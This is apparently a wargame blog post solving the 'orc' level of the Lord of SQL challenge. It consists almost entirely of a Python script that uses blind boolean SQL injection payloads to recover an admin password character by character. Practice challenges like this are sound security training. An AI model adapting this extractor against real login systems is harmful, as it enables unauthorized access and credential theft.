LOS orc

Wargame/Lord of SQL 2018. 2. 8. 20:49
import urllib2

def request(data):
url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()

if "Hello admin" in str(response):
return True
else:
return False

length = 0
admin_pw = ""

for i in range(0,50):
payload = "' or id='admin' and length(pw)="+str(i)+"#"
if request(payload)==True:
length = i
break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
for i in range(0,128):
payload = "' or id='admin' and ascii(substr(pw,"+str(j)+",1))="+str(i)+"#"
if request(payload)==True:
admin_pw += chr(i)
print "[-]Admin Password = " + admin_pw
break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS darkelf  (0) 2018.02.08
LOS wolfman  (0) 2018.02.08
LOS goblin  (0) 2018.02.08
LOS cobolt  (0) 2018.02.08
LOS gremlin  (0) 2018.02.08
블로그 이미지

JeonYoungSin

메모 기록용 공간

,